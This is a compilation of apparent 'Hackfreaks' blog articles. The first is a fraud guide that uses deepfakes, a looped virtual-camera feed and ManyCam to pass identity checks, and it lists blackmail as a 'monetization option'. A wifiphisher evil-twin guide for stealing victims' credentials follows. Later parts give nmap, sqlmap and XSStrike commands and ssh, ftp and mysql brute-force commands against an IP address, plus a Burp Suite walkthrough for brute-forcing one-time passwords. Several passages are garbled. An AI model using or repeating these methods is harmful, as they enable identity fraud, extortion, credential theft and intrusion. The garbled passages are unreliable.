NVIDIA graphics cards up to GTX1080 and any 64-bit processors. DeepFaceLabCUDA10.1AVX for NVIDIA graphics cards up to RTX and processors with support for AVX instructions. DeepFaceLabOpenCLSSE for AMD video cards and any 64-bit processors. 2) Put 2 files into the VorkSpace folder. The first one is data_dst.mp4 — — this is the face that will be replaced The second is data_src.mp4 — this is the person who will be used for the replacement. 3) Order 2) extract PNG from video data_src.mp4 — the program extracts the face that WE WILL REPLACE. Face PNG format 3.2) extract PNG from video data_dst FULL.mp4 — the program extracts the face that WILL BE CHANGED. PNG format 4) data_src extract faces MT all GPU — extracts a finite set of faces from PNG to the workspace \ data_src \ aligned folder 4.1) data_scr check result — check how the person, WHICH WE WILL REPLACE, was extracted. 4.2.2) data_src sort by similar histogram — After this sorting, the faces will be grouped by content, so it’s much easier to filter out unwanted faces. Scroll and delete unwanted faces in groups. 4.1) data_scr check result — check how the person, WHICH WE WILL REPLACE, was extracted. We delete unnecessary ones. You see, the faces are now in line with the turn of the head. 1) data_src sort by blur.bat — Sort by sharpness. Run and wait for sorting. Then see the results. The dullest faces will be at the end. It is important for src to remove cloudy faces. 4.1) data_scr check result — check how the person, WHICH WE WILL REPLACE, was extracted. We remove unnecessary CLOUD FACES. 5) data_dst extract faces MT all GPU — Same as item 4, with some differences. If a face was not detected in some frame, then there is an option + manual fix for this — it allows you to manually specify faces in frames where no faces were detected at all. 5.1) data_dst check result 5.2) data_dst sort by similar histogram — If the target video contains other unwanted faces, you can do this sorting, and then it will be easier to remove these faces. 5.1) data_dst check result — remove unnecessary frames 6) train H64 best GPU — — better CTRL + F train … bat training in manual_ru.pdf WE WAIT !!! 6) train H64 best GPU — once again. Some diagrams appear, then it closes. 7) convert H64 debug — — convert … .bat Face overlay. The debug option allows you to see the process of overlaying faces and some technical information for each frame in the console, press the spacebar in the viewport. It seems like he always clicked 0. -3.01 in the video 7) convert H64 debug — AGAIN? Combinations: one one empty empty -five empty empty empty !!! 7) convert H64 debug — AGAIN? Combinations: one one twenty 40 empty empty empty empty 7) convert H64 Combinations: one one twenty 40 empty empty empty empty WAITING FOR COMPLETION 8) convert to mp4 WAITING FOR COMPLETION Go to the RESULT folder and see a new file result.mp4 — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — - Configs if you want to train with SAE == Model options: == | == autobackup: True == | == write_preview_history: True == | == batch_size: 2 ( == | == sort_by_yaw: False == | == random_flip: False == | == resolution: 192 == | == face_type: f == | == learn_mask: True == | == optimizer_mode: 2 == | == archi: liae == | == ae_dims: 192 == | == e_ch_dims: 42 == | == d_ch_dims: 21 == | == multiscale_decoder: true == | == ca_weights: true == | == pixel_loss: False == | == face_style_power: 10 == | == bg_style_power: 10 == | == apply_random_ct: true == | == clipgrad: true == Running on: == | == [0: GeForce GTX 1080] On the A64, everything is by default — — — — — — — — — — — — — — — — - ADVICE H128, DF, LIAEF128 models: Use pixel loss? (y / n,?: help skip: n / default): allows you to quickly improve fine details and remove jitter. Enable only after 20k iterations. — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — - Site of the second program https://faceswap.dev/forum/viewtopic.php?f=5&t=27 — — — — — — — — — — — — — — — — — — - IMPORTANT !!!! Regardless of how long your video is running, face swap processing will take the same amount of time. For the coolest indicator, you can use 500,000 (it will take 3–4 days, it all depends on the video) We set up gps for registration and look for a clean ip for the city of registration! — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — METHOD 3 — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — - https://www.elladodelmal.com/2019/04/autoencoders-gans-y-otros-chicos-buenos_10.html — ARTICLE. We set up gps for registration and look for a clean ip for the city of registration! — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — METHOD 4 Substitution of the image in the camera, in this way, for example, you can register the carger accounts on the left data, because in some applications it is impossible to load existing photos, for this we just need the installed Linux operating system. 1. Install the virtual camera Install the codec; apt-get install git make ffmpeg Clone the driver repository; mkdir codek cd codek git clone https://github.com/umlaeute/v4l2loopback.git cd v4l2loopback Install; make && sudo make install sudo depmod -a And we launch; sudo modprobe v4l2loopback We have a device / dev / video0 or the number above if you already had something 2. Start the translation of the image into the video stream of the driver ffmpeg -loop 1 -r 1/5 -i “path_to_image” -c: v libx264 -vf fps = 25 -vcodec rawvideo -pix_fmt yuv420p -threads 0 -f v4l2 / dev / video0 We must specify -loop 1 to loop this action. 3. Well, now the final stage, this is emulation, open Android Studio, open the window where the virtual machine is edited and in the camera settings, select our virtual device, start and take off life We set up gps for registration and look for a clean ip for the city of registration! METHOD 5 — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — https://www.limontec.com/2018/02/deepfakes-criando-videos-porn-falsos.html — ARTICLE https://youtu.be/D-96CM4chHc We set up gps for registration and look for a clean ip for the city of registration! METHOD 6 Creation of camera spoofing https://github.com/corkami https://github.com/corkami/mitra file1 first (top) input file. file2 second (bottom) input file. optional arguments: -h, — help show this help message and exit -v, — version show program’s version number and exit — verbose verbose output. -n, — nofile Don’t write any file. -f, — force Force file 2 as binary blob. -o OUTDIR, — outdir OUTDIR directory where to write polyglots. -r, — reverse Try also with <file2> <file1> — in reverse order. -s, — split split polyglots in separate files (off by default). — splitdir SPLITDIR directory for split payloads. — pad PAD padd payloads in Kb (for expert). We set up gps for registration and look for a clean ip for the city of registration! METHOD 7 For those who could not pass verification (and I know that there are many of them). Keep a fit. After all, Badoo is one of the leaders in the number of mammoths and wankers. Snapchat has a gender reassignment filter. This feature allows you to easily pass verification on Badoo, and then accept jerk traffic and make money on it in all known ways. You need to open the camera in the application, to the right of the “Take photo” button there is a drop-down gallery of masks — the necessary filters are there; Among the “masks” there are two: one with a man’s face, the other with a woman’s. These are the “gender reassignment” filters; After activating the filter, you need to position the camera so that the face falls within the boundaries of the “mask”; The filter works only in “live” mode, you cannot add photos from the gallery. But you can switch to the rear camera and, for example, capture the face of the person in the photo. We set up gps for registration and look for a clean ip for the city of registration! METHOD 8 First, https://developer.nvidia.com/cuda-80-ga2-download-archive and install CUDA 8.0 The installation is standard, after we reboot. You don’t need to patch anything. Download fakeapp Download https://ffmpeg.zeranoe.com/builds/ IMPORTANT! LET’S REPEAT IN A POINT !!! We unpack FakeApp.zip to the root of the C drive. Also, in the root of the C drive, create the fakes folder, inside we create the data, data_A, data_B folders. ffmpeg, unpack it into the FakeApp folder. We get such a picture Video stage preparation I have uploaded a video from the interview of Chloe Moretz and now I need to cut sections of the video with her face using any video editor. Save the cut video in 720p quality to the C: \ fakes \ data_A folder and call it 1.mp4 We launch the command line, write: C: \ FakeApp \ ffmpeg \ bin \ ffmpeg.exe -i C: \ fakes \ data_A \ 1.mp4 -vf fps = 25 “C: \ fakes \ data_A \ out% d.png” In the C: \ fakes \ data_A folder, we see how the pictures appear, we are waiting for the process to complete. After completion, delete video 1.mp4 in the C: \ fakes \ data_A folder Run fakeapp.bat in the C: \ FakeApp folder Select Align, specify the Data field C: \ fakes \ data_A Click Start. WE ARE WAITING FOR FULL COMPLETION! An aligned folder will appear in the C: \ fakes \ data_A folder where all her faces are ordered. Stage # 2 Find a video for a friend and repeat the whole process, only instead of data_A we specify data_B. The main video for a friend should be one face, if there are several faces in the frame, the program will change all of them. After the aligned folder with ordered faces appears in the data_A and data_B folders, we proceed to training. This process is an asshole, because it takes a lot of time to train a neural network. Go to the Train tab In the Data A field, specify the path C: \ fakes \ data_A \ aligned In the Data B field, specify the path C: \ fakes \ data_B \ aligned Click Start and wait. We observe how the neural network gradually learns and the quality of the photo improves. If you are tired of waiting or the quality suits you, press the Q key, the program will save the “scales” of connections and you can continue the calculations in the future, nothing is lost. The neural network will learn for about a day at 1050ti. It doesn’t take long to glue the finished video, it takes a maximum of 1 hour. METHOD 9 Well the game is easy, nothing much. Install Crazytalk free software from internet or any similar 3D animator will work. Use the portrait picture which you used in DL. From the crazytalk software you can make the face moving of a picture. I’m attaching 2 kinda video tutorial with this article. Video tutorial: 1: https://youtu.be/y6NSEoPq_0Q 2: https://youtu.be/CPMkAqoLCAM After that, export it or screen-record the moving face. Now install manycam or similar software. They turn your webcam to any custom videos you need. Setup the manycam (Some settings need to be done, you can learn from YouTube) After that, add the face moving Video to manycam software At verification page when it opens camera, manycam will work as the camera. you can use or set the picture or any video on your choice that you want to show. So at while verification, when it ask for camera verification, manycam will open instead of webcam and will play the video or photo you inserted. when you put face moving video, they will recognise as real and will verify you. Also to upload DL you can use the same way. That’s it, best of luck Donate : 32GFwevY5gFQ4qNU19hEaPUSDwT9g7X4zr Passes for SBA and PPP Easily WARNING Monetization options Webcams; Blackmail; Identification; Etc. - you fasten the client’s photo to the “naked body” - you attach a photo to a video and go through identification in affiliate programs / services We set up gps for registration and look for a clean ip for the city of registration! bitzlato hodlhodl paxful bitpapa cryptolocator localcryptos localcoinswap garantex Whitebait Totalcoin Risex Vertex prizmBit Bitcoinglobal skyBTCbanker SkyCrypto monabey bisg Localmonero AgoraDesk And others. If you have something to add or refute, write : Here Thanks for reading! FEW MORE INTRESTING ARTICLE $ 300 per day eWhoring New Method. 18+ only Docker for Pentesters And Bug Bounty. How to find out about vulnerabilities in web applications before attackers Hacking |How to kill someone’s WhatsApp account. Web application firewall(WAF) bypass. How scammers steal cryptocurrency from users Continue reading...
What do you need Our main tool is w ifiphiser . All actions must be performed on a machine with Kali Linux installed. Remember, you can always use VirtualBox with the distribution installed. What else? You need a USB WiFi adapter, preferably something from Alfa or TP-Link. WARNING Step-by-step instruction 1️⃣ Clone repository rougehostapd . • git clone wifiphisher / roguehostapd 2️⃣ Install wifiphisher. • git clone wifiphisher / wifiphisher • cd wifiphisher • sudo python setup.py install 3️⃣ Enter the wifiphisher command (no dot). This is roughly what we will see when we drive the team. And then a window like this will open: here you can see which Wi-Fi networks are nearby. 4️⃣ Select the desired access point (press ENTER). Then it will be redirected to the page where the attack will start. ➡️ The attack takes place in 3 stages: Sending deauthentication packets . └This is necessary for the client devices to disconnect from the network and try to initiate a new connection to the Wi-Fi router. Checking the number of connected victims . └This way we can understand how many people are connected to our Wi-Fi hotspot. HTTP requests . └They show what request is being sent to the victim’s web browser by our hotspot. Here’s what mammoths will see when they connect to our Wi-Fi hotspot. Here, the user who is trying to connect is prompted to enter their Facebook login credentials (just an example). So you need to get access to Wi-Fi. Mammoths drive in data, and we intercept it. This is what the victim will see when he “logs in” to Facebook. ➡️ Done! We received the victim’s credentials, which means we can log into the account and do whatever we want there. Summary Never connect to open free Wi-Fi hotspots, only visit websites with HTTPS encryption, and never use your credentials to log in to websites with HTTP. If you really need to, at least use a VPN. It will encrypt traffic. Stay Connected! Your DW. Thanks for reading! FEW MORE INTRESTING ARTICLE $ 300 per day eWhoring New Method. 18+ only Hacking |How to kill someone’s WhatsApp account. How to Hack Telegram Web application firewall(WAF) bypass. How scammers steal cryptocurrency from users How To Check Site Vulnerabilities. Step by Step Part 1 Continue reading...
How To Checke Site Vulnerabilities. Step By Step Part 2. We continue the topic from the previous article. Checking the authorization forms You can find authorization forms using the following command (instead of <target> — substitute the domain of your site): After you have found the pages with authorization, you can try to pick a password and login to enter the site’s admin panel. Parameters: http-brute.hostname — hostname http-form-brute.path — the address of the page with the form or the address with the API http-brute.method — method type , POST by default http-form-brute.uservar — sets the name of the variable that is responsible for the username. If not set, the script will take the field name from the form http-form-brute.passvar — sets the name of the variable that is responsible for the password. If not set, the script will take the field name from the form Parameters must be listed separated by commas after -script-args. If the script succeeds, it will output something like this: If the authorization form uses cookies parameters or csrf-token , then in this case it will give an error. This means that basic protection is present. 3. We are looking for hidden folders and files Often, developers or system administrators are rather negligent about access rights and forget to close access to system and other important folders. You can also check if we have such folders on the server using the nmap utility. The commands will look like this (instead of <target>, you need to substitute the server IP address or site domain): As a result, the report will show us the folders available for viewing, interesting files — password files, database backups, etc. (If such exist). An example of a small report: 4. Checking for SQL injection It so happened that most modern web applications use SQL databases to one degree or another. Usually, parameters of a web page or some user data are substituted into SQL queries and the results of the query are displayed on the web page. If the passed parameters are poorly filtered, then the web service becomes vulnerable to SQL injection. If the site is vulnerable and performs such injections, then in fact it is possible to do whatever you want with the database (most often MySQL). This is how user bases and their personal data are most often stolen. Next, I will show how, using scripts, to quickly and efficiently check whether there are such vulnerabilities in the site of interest to us. Often, even fairly experienced developers forget about precautions, which is why even serious products have similar problems. Let’s try to check our test web service for such problems using the sqlmap tool . Install sqlmap. Sqlmap is an open source cross-platform scanner that allows you to automatically test web services for SQL injection and then use them to gain control over the database. In this article, we will only consider the methods of how to find pages, APIs and forms vulnerable to SQL injection, without details on how to use the found vulnerabilities to cause harm — This is what we teach in our freaks Hub. Installation on Windows To get started, we need to install Python. The Python installer for Windows can be found on the official website. Click here to download The site has two branches — 2.x and 3.x, but it’s better to download and install the 3.x branch. Sqlmap works correctly with each of these versions, but in the future we need version 3.x. You can download the latest sqlmap here . Unpack the archive into any convenient folder (to make it easier to find it, you can unpack it to the folder C: \ Users \ <your username>) To start, you first need to open a command line. Press Win + R, in the window that appears, type cmd and press enter. Launch example: We start checking In my test service, I specially prepared sql vulnerabilities. Let’s try to find them with the following command. The — dbs option means that we are interested in the names of the databases. If successful and there is a vulnerability, after defining the databases, you can proceed to search for tables and obtain the required data. The command must be entered into the console. After a while, the script may ask us to clarify some data. In this case, I choose “no” so that the script will run all tests. The script displays a report: After continuing the analysis, we are primarily interested in the line at the end: GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]. As you can see, the script determined that the id parameter is vulnerable and suggests testing other parameters. In our particular case, there are no other parameters, but in real web applications there can be dozens of such parameters, so sometimes it makes sense to check everything. Final report: As a result, the script not only determined that the id parameter is vulnerable, but also the version of the DBMS , and also received the name of the database used on the server — vc_test , which contains the content of the site. This information can be found at the end of the generated report. In the future, it is usually no longer a problem for a hacker to get data in tables, and possibly full control over the entire database, or even the entire server and the source code of the site, if a user with broad rights is used for queries. In addition, sqlmap allows you to set http headers and Cookies parameters, which is quite convenient for testing, especially when authorization is required to get the result of the request. An example of testing a POST request . Parameters that are passed in the body of the request are written to the script option — data . The necessary parameters for a POST request can be spied on in the browser console (Ctrl + Shift + I in Windows, then go to the Network tab, take the desired action, and then study how the request is formed) After authorization, it is usually necessary to transfer the required Cookies . In sqlmap, the — cookie option is responsible for this . The required cookie values can be obtained in the developer tools of your browser. ( in Windows ctrl + shift + i, then find the Network tab, and in it click on the request with the site’s domain name. In the window on the right, scroll until you see the cookie parameter ) Sample sqlmap command with — cookie option . sqlmap.py -u http://localhost/create --data="name=alex&message=hacked" --cookie="security_level=low; PHPSESSID=05aa4349068a1kkaje4kcqnr9o6" --dbs -o -random-agent If there are several parameters, then you can explicitly specify which parameter will be tested using the -p option . You can set http headers using the — headers option . This is extremely useful for testing your APIs. Also, if the get parameter is passed not as a get parameter, but as a URI, then in this case it is necessary to explicitly indicate using * that this part of the URI is a parameter. Example: sqlmap.py -u "http://localhost/api/v2/news/2*" --headers="Authorization: Bearer <token>" --dbs -o -random-agent Thus, you can test your web application for SQL injection rather thoroughly. It is also extremely useful to use sqlmap for automated tests. To protect against SQL injection, you need to carefully filter parameters and HTTP headers, and also use prepared queries . 5. Checking for XSS vulnerabilities. Cross-site scripting (XSS) is a vulnerability that involves an attacker injecting their own Javascript code into a web page that is displayed in a user’s browser. After such an injection, the hacker actually hijacks the web page and can manipulate the user’s data while he is on the page. If successful, he can: Embed your scripts into a web page Send user data to your server — bank cards, session IDs, passwords, etc. Take actions on behalf of the user — send spam, make money transfers The vulnerability occurs due to insufficient filtering of data that is displayed when the page is rendered. Such vulnerabilities are quite common even in large products, so you should definitely test web applications for XSS vulnerabilities. In this case, we will use the XSStrike utility for testing . XSStrike is a fairly advanced open source XSS vulnerability scanner. It is written in Python3 and is fairly easy to initial setup and use. Installation To install, you need to download the archive from the link and unpack it into a folder convenient for you. After that, you need to open the console and go to the unpacked folder. Then you need to run the commands in the console: Install the libraries necessary for correct operation: We are now ready to test. An example of a simple launch, instead of my url, specify the address of the page you want to test: Very quickly, the script discovers that the page parameter is vulnerable (the Reflections found line ) and through it you can pass js code that will be executed on the page. An example of such code is given in the Payload line . This type of XSS vulnerability is called reflected XSS . In addition, you can validate forms as well. Let’s send a form for review that sends a message to our service. To pass a list of POST parameters, use the — data option . Result: the name parameter is vulnerable. What the response looks like when the script does not find vulnerable parameters: In addition, XSStrike supports the ability to transmit http headers, including cookies, and check pages that need authorization to open. The — headers option is used for this . python xsstrike.py -u "http://161.35.92.161/index.php" --data "name=&message=" --headers "Authorization: Bearer <token> Cookie: zmname\=none" --blind You can also run a crawl across the entire site. You need to specify a start page and the scanner will start crawling all found pages. The -l 100 entry controls the number of crawled pages. The script will show the pages on which vulnerable parameters were found. The found pages can already be investigated in more detail. Also a useful feature is traversing the url of pages that are specified in the file using the — seeds option . Can also be used in conjunction with the — headers option . Thus, you can thoroughly check any web application for XSS vulnerabilities. Conclusion We hope this guide is helpful to you. This knowledge, which we gave you in two parts of this article, has endless monetization options. Note that it is also worth checking not only the site itself, but also admin panels, auxiliary services on subdomains, because they can also be vulnerable to such automated systems and scripts. Thank you all for your attention! Continue reading...
Hey Freaks! Hackfreaks here In this article, we will tell you step by step how to comprehensively scan a site for vulnerabilities in half an hour, even if you are not hackers. Now, most articles on the Internet on the topic of searching for vulnerabilities on their site are divided into two types: this is either a banal list of online scanners without detailed instructions on how to use them, or hardcore manuals for information security fans and other hackers, where you cannot figure it out without Linux. Not all of our subscribers are like that, so it was decided to make an article where we will consider the process as simply and in detail as possible. Now we will clearly and step by step show how to independently check the site of interest using such tools, as well as how to understand the generated reports. What we will check: Access to server and source codes Vulnerabilities in web servers (Apache or NGINX) SQL injection Cross-site scripting (XSS). Application and server resistance to brute-forcing passwords Gaining access to system catalogs As a test site, we wrote and deployed a small self-written blog with the ability to leave comments on articles and added the entire gentleman’s set to it: Numerous SQL Injections XSS vulnerabilities Simple password for ssh access Open ftp Lack of protection against brute-force passwords Database accessible from the Internet with a simple password Too broad access rights to folders and files In general, everything is how it is not necessary to do. But many do it anyway :) 1. Checking the network infrastructure. In cyberattacks, as well as in war, it all starts with reconnaissance in order to find the opponent’s vulnerability . In order to effectively attack, we need to know what software is used on the server and what doors are open or not closed tightly enough. Nmap is a set of tools for scanning the network infrastructure of a web service. It can be used for security checks, to identify running server applications. Nmap allows you to run pre-built scripts that greatly simplify the analysis of your server. The downside is that now even a smart schoolboy, armed with a bunch of scripts, can pose a threat to the company’s servers. We looked at the pictures, now you can work! Let’s get down to business. Install nmap There is nothing difficult in the installation. We will show examples of installation using Windows as an example. Linux distributions usually have the latest version of nmap installed by default. Installing on Windows 10 Go to the nmap download link and download the latest stable release. Then run as administrator. The installer will prompt you to install all components by default, you can leave the checkboxes on. We will not describe the steps further in detail (Accept the license agreement, etc.), everything is easy there. Running nmap on Windows You can run nmap both in the graphical interface mode and through the command line. To launch the graphical shell, enter nmap in the search bar and select nmap — Zenmap GUI in the results For further work, you can enter the required commands in the “Command” field, and then click on the Scan button. You can see the scan results in the form of a text report in the window that I carefully signed “Report” Zenmap interface We are closer to using nmap through the command line aka console. To run the command line, enter “cmd” in the search bar on the toolbar. Press Enter and then Command Prompt will open. Then you can enter nmap commands directly into it. The command line in Windows 10 with the nmap command entered looks like this: Install scripts We also need to install the nmap_vulners script , which will check whether the software we are using contains vulnerabilities. To install it, you need to download the script files and transfer the http-vulners-regex.nse and vulners.nse files to C: \ Program Files (x86) \ Nmap \ scripts . We start checking First, we run a server scan with the command below to find out which ports are used and for what. The command looks like this (substitute your ip or domain). The command must be entered in the console window, or if you are using Zenmap GUI, then in the “Command” field (example above) The T5 parameter is responsible for the server analysis speed. The speed can be changed from T0 to T5, where T0 is a very slow analysis speed and T5 is a very fast one. If you don’t want to overload the server, then use T2. We start checking First, we run a scan of our server with the command below to find out which ports are used and for what. The command looks like this (substitute your ip or domain). The command must be entered in the console window, or if you are using Zenmap GUI, then in the “Command” field (example above): The T5 parameter is responsible for the server analysis speed. The speed can be changed from T0 to T5 , where T0 is a very slow analysis speed and T5 is a very fast one. If you don’t want to overload the server, then use T2. The -p- parameter means that we will check the entire port range (‘this will take about 10 minutes). It can be removed and then the script will not scan all ports, but only the first 1000 (the most common). The answer will look something like this: From the report, we can see that nmap has shown us the ports (under the PORT column) that are active. In this case, we use: Port 21 is busy for FTP Port 22 is busy under SSH . Port 80 is listening on the Apache server . Port 3306 is used by MySQL Now we run our script that will check the vulnerabilities in our software on the server. To do this, run the following command indicating the ports that we will check. You will need to replace the list of ports with your own. Sample report. Links to the description of the vulnerability follow the line vulners (an example of such a line with a link in the report: CVE-2014–9278 4.0 https://vulners.com/cve/CVE-2014-9278 ) As you can see from the report, the script analyzed the active software of our server and kindly provided links with a description of each vulnerability found. That you will agree, it is very convenient as us. You can also write the analysis result to a file, which can then be thrown off to the responsible developer or system administrator. The results file itself will be located in the directory from which you run the script. An example of such a command is below: nmap -T5 -sV -Pn 161.35.92.161 --script=vulners.nse -p22,80,443,8080,8443,3306,20,21,23 > result.txt 2. Checking the brute force resistance. In our case, nmap has detected that the server has ssh, ftp and mysql. Let’s try to check how strong passwords are used. SSH Enter the following command (remember that you need to enter either in the console or in the “Command” field of the Zenmap GUI program. nmap --script ssh-brute -p22 161.35.92.161 --script-args userdb=users.lst,passdb=passwords.lst If successful (the process is not fast), the script will display the chosen password and login. The matched username / password pairs will be displayed after the Accounts line : In addition, you can extend the standard nmap lists of passwords and users by replacing the users.lst and passwords.lst files. Various brute force bases can be found in this gitbub repository . Files with the password database can be placed in the nmap / nselib / data folder FTP Now we check the FTP port with the following command: nmap -d --script ftp-brute -p 21 161.35.92.161 Similarly, the service will display matched pairs of usernames and passwords: MySQL We check if anonymous login is available. nmap -sV --script=mysql-empty-password <target> In case of success: We are trying to find a pair of username / password to enter the mysql database. nmap --script mysql-brute -p 3306 <target> --script-args userdb=users.lst, passdb=passwords.lst Also, if you use CMS (WordPress, Joomla, Drupal, Bitrix) and other databases (Mongo, Postgres, Redis), then you can find ready-made scripts to check the stability of your passwords and forms. Search by keywords <name_of_CMS_or_DB> brute force nmap That’s all for today. Continuation in the next article, which will be released very soon! Continue reading...
The content of the article Description of the task More about the task Solutions Method 1. Using macros Method 2. Using the Stepper plugin Method 3. Using the Turbo Intruder plugin Conclusion Hey freaks! Hackreaks Here so, now straight to the point. When attacking a web application, you sometimes need to perform a chain of actions many times. The most striking example is brute-force passwords or second factor of authentication, or multiple use of resources. There are different tools for this. Which one to choose if, for example, we need to make five requests over HTTP a thousand times in a row, maintaining the same session? I’ll choose Burp Suite, and here’s why. Scripting languages are great for automating multi-step attacks, but not everyone and it is not always convenient to spend an extra hour writing and debugging code when there is a ready-made solution nearby that requires minimal configuration. Equally important, in order to achieve a high speed of sending and processing requests, as well as for parallel execution, you need to know the correct stacks that do not slow down parallel execution and do not perform unnecessary actions that complicate execution. If you find it difficult to implement such tasks using programming languages or you think it will take a long time, you can use Burp Suite. This tool provides several ways to automate at once: macros; 3rd party Stepper plugin Turbo Intruder plugin from the makers of Burp Suite. We will talk about what these approaches give, about their capabilities and limitations. We will consider the work of these three approaches using the example of a problem that has to be solved very often: brute force four-digit one-time passwords that are used … Yes, almost everywhere. Incidentally, the bug bounty for the operation of NKM-Vimos-dren we can get-but not low-cart-reward-denie . As a test bench, a task from the educational resource PortSwigger Academy , which requires us to perform hundreds of multi-step repetitive actions, is perfect. WARNING DESCRIPTION OF THE PROBLEM Here’s how the test problem is formulated on the PortSwigger Academy website: The peculiarity of this task is that it is not enough just to iterate over the One Time Password (hereinafter OTP) code with an existing session, because after two incorrect attempts, the application stops considering the session valid. To solve the problem, we have to perform pre-authentication using credentials, and then try to predict the OTP code. More about the task We are given an authentication page that looks like this. Authentication page When entering credentials, the application sends the following request to the server: POST /login HTTP/1.1 Host: ace61ff51f4557d880dbab96004f009d.web-security-academy.net Cookie: session=rcnBF1vzBD00ZSjcoswRzttRrEPIQNj2 Content-Type: application/x-www-form-urlencoded Content-Length: 70 csrf=AxCZcrNQ1Y7x8xTI9odKun0alLM34a9a&username=carlos&password=montoya If we enter the credentials correctly, the next page for entering the OTP code appears on the screen. OTP input page After entering a random OTP code, the application will send the following request: POST /login2 HTTP/1.1 Host: ace61ff51f4557d880dbab96004f009d.web-security-academy.net Cookie: session=2gt4P1gFqzyxZJIonAlFv9czYetD5pm0 Content-Type: application/x-www-form-urlencoded Content-Length: 51 csrf=W9Nei8NhTXl5usVKeynuZ3kbjRHaVjW7&mfa-code=1234 If we can guess the OTP code, we will solve the problem. The chance of guessing, in fact, is not so small: 1 in 10,000. Taking into account the fact that the number of attempts we have is not limited, even if it requires additional actions, the result is 100% guaranteed. What is important to know before we start solving this problem? The application uses the session identifier that we receive when we enter the site. It changes after the first round of authentication with the correct credentials. After authentication, we only have two attempts to enter the OTP code. After two unsuccessful attempts, our session becomes invalid and we have to start the whole process from the beginning. The app uses CSRF tokens that change on every request. They need to be picked up and replaced for each of our POST requests. It remains to automate the process of obtaining a session, entering primary credentials, picking up CSRF tokens and trying to predict the OTP code. Let’s get started! SOLUTION METHODS Method 1. Using macros Burp Suite macros are a mechanism for automating predefined workflows. You can use macros within session processing rules to solve various problems. It is not difficult to learn how to use them, especially on the example of our problem. With Burp Suite running, we log in as Carlos (the credentials are specified in the task) and collect HTTP authentication packages up to 2FA verification. They will be useful to us for setting up a macro. Since the session is constantly changing and is invalidated on unsuccessful attempts to enter the code, we need to support it in some way. For this we will use Burp’s session handling capabilities. Let’s move on to configuring them. In the Burp menu go to Project Options → Sessions. On the Session Handling Rules panel, click the Add button. The Session handling rule editor dialog will open. Here we will add the rules for maintaining the session and its resumption. In the dialog window, in the Scope tab, in the URL Scope section, select the Include All URLs value so as not to bother with fine-tuning. The session will be supported for any URL. Let’s go back to the Details tab and start creating the macro. In the Rule Actions section, press the Add button and select Run a macro in the window that opens. This is where the process of creating a macro will begin, which will be repeated every time we send our request. In the macro settings window that opens, select the requests for automation (these will be requests for the initial login, getting the session ID and CSRF token for sending the first form). To do this, in the Select macro section, press the Add button. Here we select the page login package /login (GET request), the /login login package with the POST request to the page, and the page login package /login2, where Burp will pick up the CSRF token to enter the OTP code. In the same tab in the lower right corner, you can test the macro we created by clicking the Test macro button. If we click this button, we will see that Burp will execute three requests in a row, pick up the Cookie data given to it and receive the CSRF token that should have been used to submit the form. Already now we only have to automate the input of the OTP code, and the job is done. Click OK and close the dialog boxes. Now, when sending each request, Burp will execute this macro to get a new session, and then substitute the session value and the value of the CSRF token in the outgoing request to update them. Now let’s take a request with sending an OTP code (POST request to a page /login2) and send it to Intruder for automation. In the Intruder tab, leave only the field for the load mfa-code (like this :) mfa-code=§1234§and go to the Payloads tab. List list from the To from list choose the From the <br> <br> <br> we found! Found here of value of the Payload of the the the the the Type Numbers and figures Indicate That <br> <br> <br> we want to the the the generate: From: 0, To: 9999, Step: 1, Min integer digits: 4. Go to the Options tab and set the Number of threads to 1 (this is necessary because Burp cannot simultaneously support session IDs for two or more threads, only for one). After that, launch Intruder and turn on the “waiting” mode. It took about ten minutes to guess the Intruder code (my code was 0643). It's super long! Not even a tenth of all attempts. Why can't it be faster? Because Session Handling cannot support a session for two threads at the same time. Let’s summarize what macros give us and what they can do. Capabilities: it is convenient to maintain a session session by constantly capturing the session ID yourself, even if it is updated; not only session values are picked up, but also all values that are used to execute a new request: variables, CSRF tokens, and so on. Problems: work in only one thread; if “cross-attacks” are needed that use the session of two users at the same time, then this is impossible to implement, since only one session is supported. rather unobvious setting, it is very easy to get confused in numerous menus. Method 2. Using the Stepper plugin The Stepper Plugin is a free plugin available in the Burp Suite Extender that helps automate workflows. You can find it on GitHub . The developers tell the following about Stepper: Let’s install it and use it to solve our problem. WARNING Very important! If you are doing this after the previous experiment, disable the previously created session handling rules and delete the macros! The Stepper module allows you to select a number of requests and declare in each of them the variables that the request receives from the previous step. Then it substitutes them, as well as the variables obtained from the response body using regular expressions, and passes them on to the next request. Such a simple and straightforward bunch. In the Proxy tab, select the three requests that we need to get a session, primary authentication, and retrieve the CSRF token. For They are found! For found here for: GET /login, POST /login, GET /login2. Having selected these requests, right-click on them and in the Extensions subsection, click the Add 3 items to Stepper → New Sequence button. We will be asked to choose a name for this sequence. I'll name her evil. Important: make sure that the packages are transferred in the correct order! To do this, the first packets must be higher than the last ones when sorting in the Proxy tab (this is solved by sorting by packet numbers from lowest to highest). Go to the Stepper module, which appeared in the tabs with the rest of the modules. Here we will see our sequence and three packets, numbered from 1 to 3. Each of the packets we can resend by clicking on the Execute Step button to get an example of the response body and test each step. Let’s perform the first step by clicking the Execute Step button. Let’s create the first variable for storing and transmitting the session ID by clicking on the Add Variable button in the lower right corner of the module. Let’s name the variable session and add a search condition to it in the Condition: field session=([\d\w]+). Thus, we will have the first session variable, which we will forward for other requests and reuse. We will also add a second CSRF token variable, which we will forward to the next request for sending credentials. The Add the the of The of the Variable of The Press the button to call the variable csrf and the add the condition of the find of IT in the old old old body in the response condition for condition for condition Condition for the field Meaning with the the the the the the the following: name="csrf" value="([\w\d]+)". Here’s what I got after following these steps. 